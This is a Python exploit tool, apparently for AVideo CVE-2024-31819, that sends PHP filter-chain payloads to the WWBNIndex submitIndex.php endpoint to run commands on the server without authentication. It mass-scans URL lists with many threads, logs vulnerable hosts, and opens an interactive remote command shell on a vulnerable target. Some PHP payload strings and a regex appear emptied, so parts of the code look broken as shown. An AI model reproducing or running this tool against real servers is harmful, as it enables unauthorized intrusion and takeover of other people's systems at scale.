import re import requests import argparse from packaging import version from rich.console import Console from alive_progress import alive_bar from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory from php_filter_chain import PHPFilterChainGenerator from concurrent.futures import ThreadPoolExecutor, as_completed requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) class AVideoExploit: def __init__(self, base_url): self.console = Console() self.base_url = base_url def custom_print(self, message: str, header: str) -> None: header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}" ) def generate_php_filter_payload(self, command): generator = PHPFilterChainGenerator() return generator.generate_filter_chain(command) def send_payload(self, payload): headers = {"Content-Type": "application/x-www-form-urlencoded"} try: response = requests.post( f"{self.base_url}/plugin/WWBNIndex/submitIndex.php", data={"systemRootPath": payload}, headers=headers, verify=False, timeout=10, ) if response.status_code == 200: return response.text else: return False except requests.exceptions.RequestException as e: return False def parse_output(self, output): match = re.search(r"\[S\](.*?)\[E\]", output, re.DOTALL) if match: return match.group(1).strip() else: return None def interactive_shell(self): session = PromptSession(history=InMemoryHistory()) while True: try: cmd = session.prompt( HTML("$ "), default="" ).strip() if cmd.lower() == "exit": break if cmd.lower() == "clear": self.console.clear() continue php_code = f"" payload = self.generate_php_filter_payload(php_code) output = self.send_payload(payload) if output: clean_output = self.parse_output(output) if clean_output: print(f"{clean_output}\n") else: self.custom_print( "No command output returned or error occurred.", "-" ) else: self.custom_print( "Failed to receive response from the server.", "-" ) except KeyboardInterrupt: self.custom_print("Exiting interactive shell...", "!") break def check_single_url(self, url): try: version_status, avideo_version = self.is_version_vulnerable(url) if version_status: php_code = "" payload = self.generate_php_filter_payload(php_code) headers = {"Content-Type": "application/x-www-form-urlencoded"} response = requests.post( f"{url}/plugin/WWBNIndex/submitIndex.php", data={"systemRootPath": payload}, headers=headers, verify=False, timeout=10, ) if response.status_code == 200: output = self.parse_output(response.text) if output: return ( f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n", True, ) return ( f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n", False, ) elif avideo_version: return ( f"{url} Version: {avideo_version} is not within the vulnerable range.\n", False, ) else: return ( f"{url} AVideo version could not be determined. Manual check advised.\n", False, ) except requests.exceptions.RequestException: return (f"{url} Request failed.\n", False) def check_avideo_version(self, url): try: response = requests.get(url, verify=False, timeout=10) version_pattern = re.compile("Powered by AVideo ® Platform v([\d.]+)") match = version_pattern.search(response.text) if match: return match.group(1) comment_version_pattern = re.compile(r"", re.DOTALL) comment_match = comment_version_pattern.search(response.text) if comment_match: return comment_match.group(1) except requests.exceptions.RequestException as e: return None def is_version_vulnerable(self, url): avideo_version_str = self.check_avideo_version(url) if avideo_version_str is None: return True, "unknown" parsed_version = version.parse(avideo_version_str) if isinstance(parsed_version, version.Version): is_vulnerable = ( version.parse("12.4") <= parsed_version <= version.parse("14.2") ) return is_vulnerable, avideo_version_str else: return True, avideo_version_str def check_urls_and_write_output(self, urls, max_workers, output_path): with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar( len(urls), enrich_print=False ) as bar: futures = {executor.submit(self.check_single_url, url): url for url in urls} for future in as_completed(futures): result, is_vulnerable = future.result() if is_vulnerable: self.custom_print(result, "+") if output_path: with open(output_path, "a") as file: file.write(result) bar() if output_path: print(f"Results written to {output_path}") def main(): parser = argparse.ArgumentParser( description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution" ) parser.add_argument("-u", "--url", help="Base URL for single target", default=None) parser.add_argument( "-f", "--file", help="File containing list of URLs", default=None ) parser.add_argument( "-t", "--threads", help="Number of threads to use", type=int, default=20 ) parser.add_argument( "-o", "--output", help="Output file to save results", default=None ) args = parser.parse_args() if not args.url and not args.file: print( "Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs." ) return avideo = AVideoExploit(args.url) if args.url: is_vulnerable_version, avideo_version = avideo.is_version_vulnerable(args.url) proceed_with_check = True if avideo_version != "unknown": if is_vulnerable_version: avideo.custom_print( f"Version {avideo_version} is within the vulnerable range. Proceeding with vulnerability check.", "+", ) else: avideo.custom_print( f"Version {avideo_version} is not within the vulnerable range. Detected version: {avideo_version}", "-", ) proceed_with_check = False else: avideo.custom_print( "Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.", "!", ) if proceed_with_check: output, is_vulnerable = avideo.check_single_url(args.url) if is_vulnerable: avideo.custom_print(output, "+") avideo.interactive_shell() else: avideo.custom_print( "The URL is not vulnerable or failed to execute the command.", "-" ) elif args.file: with open(args.file, "r") as f: urls = f.read().splitlines() avideo.check_urls_and_write_output(urls, args.threads, args.output) if __name__ == "__main__": main()